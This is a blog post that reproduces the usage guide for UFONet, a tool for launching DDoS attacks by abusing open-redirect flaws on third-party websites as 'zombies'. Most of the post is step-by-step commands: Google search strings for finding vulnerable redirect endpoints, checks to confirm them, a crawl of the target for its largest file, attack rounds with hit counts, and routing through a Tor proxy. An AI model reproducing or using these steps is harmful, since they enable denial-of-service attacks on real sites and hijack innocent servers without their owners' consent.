Thursday, January 7, 2016
UFONet - is a tool designed to launch DDoS attacks
UFONet - is a tool designed to launch DDoS attacks against a target, using 'Open Redirect' vectors on third party web applications, like botnet.
See this links for more info:
º CWE-601:Open Redirect: http://cwe.mitre.org/data/definitions/601.html
º OWASP:URL Redirector Abuse:
https://www.owasp.org/index.php/OWASP_Periodic_Table_of_Vulnerabilities_-_URL_Redirector_Abuse2
º Web: http://ufonet.03c8.net
Installing:
UFONet runs on many platforms. It requires Python (2.x.y) and the following libraries:
python-pycurl - Python bindings to libcurl
python-geoip - Python bindings for the GeoIP IP-to-country resolver library
On Debian-based systems (ex: Ubuntu), run:
sudo apt-get install python-pycurl python-geoip
Source libs:
º Python: https://www.python.org/downloads/
º PyCurl: http://pycurl.sourceforge.net/
º PyGeoIP: https://pypi.python.org/pypi/GeoIP/
Searching for ‘zombies’
UFONet will search on google results for possible ‘Open Redirect’ vulnerable sites.
A common query string should be like this:
‘proxy.php?url=’
‘check.cgi?url=’
‘checklink?uri=’
‘validator?uri=’
So for example, you can begin a search with:
./ufonet -s 'proxy.php?url='
At the end of the process, you will be asked if you want to check the list retrieved to see if the urls are vulnerable.
Wanna check if they are valid zombies? (Y/n)
Also, you will be asked to update the list adding automatically only ‘vulnerable’ web apps.
Wanna update your list (Y/n)
If you reply ‘Y’, your new ‘zombies’ will be appended to the file named: zombies.txt
Examples:
with verbose:
./ufonet -s 'proxy.php?url=' -v
retrieve 15 urls:
./ufonet -s 'proxy.php?url=' --sn 15
Testing botnet
Open ‘zombies.txt’ (or another file) and create a list of possible ‘zombies’.
Urls of the ‘zombies’ should be like this:
http://target.com/check?uri=
After that, launch it:
./ufonet -t zombies.txt
At the end of the process, you will be asked if you want to update the list adding automatically only ‘vulnerable’ web apps.
Wanna update your list (Y/n)
If you reply ‘Y’, your file: zombies.txt will be updated.
Examples:
with verbose:
./ufonet -t zombies.txt -v
with proxy TOR:
./ufonet -t zombies.txt --proxy="http://127.0.0.1:8118"
Inspecting a target
This option is useful to know the best place to attack your target.
It will crawl your objetive to provide you with a URL path to the largest object (size)found in the HTML code.
./ufonet -i http://target.com
Then, you will can drive your ‘zombies’ to reload just there, doing your most effective attack.
./ufonet -a http://target.com -b "https://cdn.server.net/biggest_file_on_target.xxx"
Attacking a target
Enter a target to attack, with the number of rounds that will be attacked:
./ufonet -a http://target.com -r 10
This will attack the target, with the list of ‘zombies’ that your provided on: “zombies.txt”, a number of 10 times for each ‘zombie’. That means, that if you have a list of 1.000 ‘zombies’, the program will launch 1.000 ‘zombies’ x 10 rounds = 10.000 ‘hits’ to the target.
By default, if you don’t put any round, it will apply only 1.
Additionally, you can choose a place to recharge on target’s site. For example, a large image, a big size file or a flash movie. In some scenarios where targets doesn’t use cache systems, this will do the attack more effective.
./ufonet -a http://target.com -b "/images/big_size_image.jpg"
Examples:
with verbose:
./ufonet -a http://target.com -r 10 -v
with proxy TOR:
./ufonet -a http://target.com -r 10 --proxy="http://127.0.0.1:8118"
with a place:
./ufonet -a http://target.com -r 10 -b "/images/big_size_image.jpg"
GUI/Web Interface
You can manage UFONet using a Web interface. The tool has implemented a python web server connected to the core, to provides you a more user friendly experience.
To launch it, use:
./ufonet --gui
This will open a tab on your default browser with all the options of the tool.
Search
Translate
Popular Posts
-
Introduction This tool is made to automate the process of retrieving secrets in the public APIs on [swaggerHub](https://app.swaggerhub.com...
-
GTFOcli it's a Command Line Interface for easy binaries search commands that can be used to bypass local security restrictions in mis...
-
As cyber threats evolve, so must our strategies to combat them. The deepdarkCTI project serves as a crucial resource, offering access to a c...
Categories
#Snowden
Active Directory Attacks
Analysis
Android
Android Hack
Android Pentest
Anonimato
Anonymity
Anti-Forensic
Anti-Forensic Tools
Anti-Government
Anti-System
Apache
API Hacking
APK
ARM
Assembly
Attack Map
Auditing Tool
Automation Tools
AvKill
AWS Pentest
Backdoor
Bind
BlueTeam
Bluetooth
Bot
botnet/DDoS
Bounty
Brute Force
Bypass
Certificate
Cheat Sheet
Cloud Forensics
Cloud Pentest
Courses
Cryptography
CTF Engine
CVEs
Cyber Forensics
Cyber War
Data Base
DeepWeb
DevSecOps
Disassembler
DLL Hijacking
Dns Enumeration
Dns Recon
Dns Spoof
Documentary
DoS
Downloads
DUMP
Elearn Security
Email Hacking
Encrypted DNS
Engenharia Reversa
Enumeration
Evasion
EXIF
Exploit
Exploitation Tools
Exposed Leaked
Fake
Filmes e Documentários
Fingerprint
Firewall
Footprint
Frameworks
Fuck The System
Fuzzer
GeoIP
Google Hacking
Hackers
Hackers News
Hackers Tools
Hacking
Hacking Ebook's
Hacking Vídeos
Hacktivism
Hardening
Hardware
Hardware Hack
Hidden
HIDS
Honeypots
How to exit the Matrix
IDS
IDS/IPS
Incident Response
Information Gathering
iOS
IoT
JAVA
Kali
Kali Linux
Keylogger
Labs
Leaked
Leaks
Leave The Matrix
Linux
Linux System
Mac
Malware
Malware Analysis
MetaSploit
Mind Map
MIPS
MITM
Monitoring
Movies
Network
Networking
New World Order
Nmap
Offensive Politics
Offensive Sec
OffSec
OffSec Exclusive Tools
Open Your Mind
OpenSSL
Os Sec
OSINT Tools
OWASP ZAP Scanner
Password Capture
Password Cracking
Passwords
Payload
PCC
PDF
Pentest
Pentest Tools
Phishing Attacks
Phones
PHP
Port Scan
Post-Exploitation Tool
PowerShell
Pr1v8
Privacidade
Privacy
Privilege Escalation
Projects
Proxy
Python
Ransomware
RAT
Recover File and Disk Analyzer
Red Team
Redes
Remote
Reverse
Reverse Engineering
Reverse Shell
RFID
Rootkit
Scan Tools
Security
Security Ebook's
Seriados
Series
Shell
Shell PHP
Shellcode
Shodan
Sniffer
Social Engineering
Source Code
Spoofing
SQLinjection
SSL
Stealer
Steganography
Stress Testing
Study
Subdomain Discovery
SysInternals
Telnet
The Theory of Conspiracy
Threat Intelligence
Tools
Tor
Trojan
Tutorials
Unix System
URL Inspector
Usb Boot
Virtual Machine
Virus
VoIP
VPN
Vulnerabilities
Vulnerability Analysis
WAF
Web Applications
Web Pentesting
Whois
Wifi-Hacks
Windows
Wireless Hacking
Word List
WordPress
X86
XSS
0 comentários:
Post a Comment
Note: Only a member of this blog may post a comment.